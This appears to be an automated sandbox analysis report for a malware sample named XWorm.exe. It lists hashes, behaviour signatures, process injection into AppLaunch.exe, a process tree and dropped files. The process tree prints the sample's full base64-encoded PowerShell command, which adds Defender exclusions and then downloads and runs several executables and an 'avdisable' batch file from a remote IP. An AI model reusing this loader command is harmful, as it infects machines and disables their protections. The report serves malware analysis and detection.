c2ac5477db91ef107a38e111b183a88fabae3a1e445cf759df38491699d65ba3

Analysis

max time kernel
139s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
06/10/2023, 00:00

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

XWorm.exe
Size

236KB
MD5

b32ea65abc9d6824feb8cf0a88edf313
SHA1

0f8376bc0c2b68443d6a11ebfda082d9bcd5616a
SHA256

272c70c2f0ab7a6fc0e18eb8184e18df2b18bf70998a1770664608160a4da3cd
SHA512

c465f90c4aa2bd11330138f41b1ccd0685f268023821dc930023c7f6f0e93211e3e6b5935726b95b6959d433e473be1b359473e1db2d133e62dc9b6a240952c8
SSDEEP

6144:CMvjES2jicP5iOo2T8VrSd/sUAO22lM0T8S81Sa:CMvDqiG59ouA2s1Sa

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
17	3684	powershell.exe
35	3684	powershell.exe
47	3684	powershell.exe
51	3684	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3832 set thread context of 2984	3832	XWorm.exe	84

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3684	powershell.exe
3684	powershell.exe
1628	powershell.exe
1628	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 3832 wrote to memory of 2984	3832	XWorm.exe	84
PID 2984 wrote to memory of 3684	2984	AppLaunch.exe	86
PID 2984 wrote to memory of 3684	2984	AppLaunch.exe	86
PID 2984 wrote to memory of 3684	2984	AppLaunch.exe	86
PID 3684 wrote to memory of 1628	3684	powershell.exe	91
PID 3684 wrote to memory of 1628	3684	powershell.exe	91
PID 3684 wrote to memory of 1628	3684	powershell.exe	91

C:\Users\Admin\AppData\Local\Temp\XWorm.exe
"C:\Users\Admin\AppData\Local\Temp\XWorm.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3832
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1628

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4cc9e7069534f7bcbb90ad7cac69ed78

SHA1
a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892

SHA256
4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c

SHA512
e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
2422a2d27846e4a079b5576f7b359339

SHA1
6b6b857606415d34fbb1ebedaca4e964e9058641

SHA256
2dbdc4fe7e6ed685d71e879a4bf12f33ef6f33d29f29f49e242584c0f120b979

SHA512
5b5f93a62e16c48a03f5828367df3949c9a598a76cf372f6a54cf0f56aaf0316f6ab44c738b713784869f60c2daa29a02dfa03122c4f6ce43dc6df1f23c1dfbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qhq2rh3j.xjs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1628-69-0x0000000074D70000-0x0000000075520000-memory.dmp

Filesize
7.7MB

Download
memory/1628-62-0x00000000071F0000-0x0000000007282000-memory.dmp

Filesize
584KB

Download
memory/1628-59-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/1628-46-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/1628-37-0x0000000074D70000-0x0000000075520000-memory.dmp

Filesize
7.7MB

Download
memory/1628-43-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/2984-0-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2984-1-0x0000000074D70000-0x0000000075520000-memory.dmp

Filesize
7.7MB

Download
memory/2984-3-0x0000000074D70000-0x0000000075520000-memory.dmp

Filesize
7.7MB

Download
memory/3684-30-0x0000000007930000-0x0000000007962000-memory.dmp

Filesize
200KB

Download
memory/3684-56-0x00000000086D0000-0x0000000008D4A000-memory.dmp

Filesize
6.5MB

Download
memory/3684-23-0x0000000006410000-0x000000000645C000-memory.dmp

Filesize
304KB

Download
memory/3684-24-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/3684-25-0x00000000073A0000-0x0000000007436000-memory.dmp

Filesize
600KB

Download
memory/3684-26-0x00000000068F0000-0x000000000690A000-memory.dmp

Filesize
104KB

Download
memory/3684-27-0x0000000006950000-0x0000000006972000-memory.dmp

Filesize
136KB

Download
memory/3684-28-0x00000000079F0000-0x0000000007F94000-memory.dmp

Filesize
5.6MB

Download
memory/3684-29-0x000000007F310000-0x000000007F320000-memory.dmp

Filesize
64KB

Download
memory/3684-31-0x0000000071B60000-0x0000000071BAC000-memory.dmp

Filesize
304KB

Download
memory/3684-21-0x0000000005EB0000-0x0000000006204000-memory.dmp

Filesize
3.3MB

Download
memory/3684-42-0x0000000007910000-0x000000000792E000-memory.dmp

Filesize
120KB

Download
memory/3684-11-0x0000000005C80000-0x0000000005CE6000-memory.dmp

Filesize
408KB

Download
memory/3684-10-0x00000000054C0000-0x0000000005526000-memory.dmp

Filesize
408KB

Download
memory/3684-44-0x0000000007FA0000-0x0000000008043000-memory.dmp

Filesize
652KB

Download
memory/3684-45-0x0000000074D70000-0x0000000075520000-memory.dmp

Filesize
7.7MB

Download
memory/3684-9-0x0000000005420000-0x0000000005442000-memory.dmp

Filesize
136KB

Download
memory/3684-22-0x00000000063D0000-0x00000000063EE000-memory.dmp

Filesize
120KB

Download
memory/3684-57-0x00000000080A0000-0x00000000080AA000-memory.dmp

Filesize
40KB

Download
memory/3684-58-0x0000000008230000-0x0000000008241000-memory.dmp

Filesize
68KB

Download
memory/3684-8-0x0000000005550000-0x0000000005B78000-memory.dmp

Filesize
6.2MB

Download
memory/3684-60-0x0000000008260000-0x000000000826E000-memory.dmp

Filesize
56KB

Download
memory/3684-61-0x0000000008270000-0x0000000008284000-memory.dmp

Filesize
80KB

Download
memory/3684-7-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/3684-63-0x00000000082B0000-0x00000000082CA000-memory.dmp

Filesize
104KB

Download
memory/3684-64-0x00000000082A0000-0x00000000082A8000-memory.dmp

Filesize
32KB

Download
memory/3684-65-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/3684-66-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/3684-6-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/3684-70-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/3684-71-0x000000007F310000-0x000000007F320000-memory.dmp

Filesize
64KB

Download
memory/3684-4-0x0000000004E00000-0x0000000004E36000-memory.dmp

Filesize
216KB

Download
memory/3684-5-0x0000000074D70000-0x0000000075520000-memory.dmp

Filesize
7.7MB

Download
memory/3684-76-0x0000000074D70000-0x0000000075520000-memory.dmp

Filesize
7.7MB

Download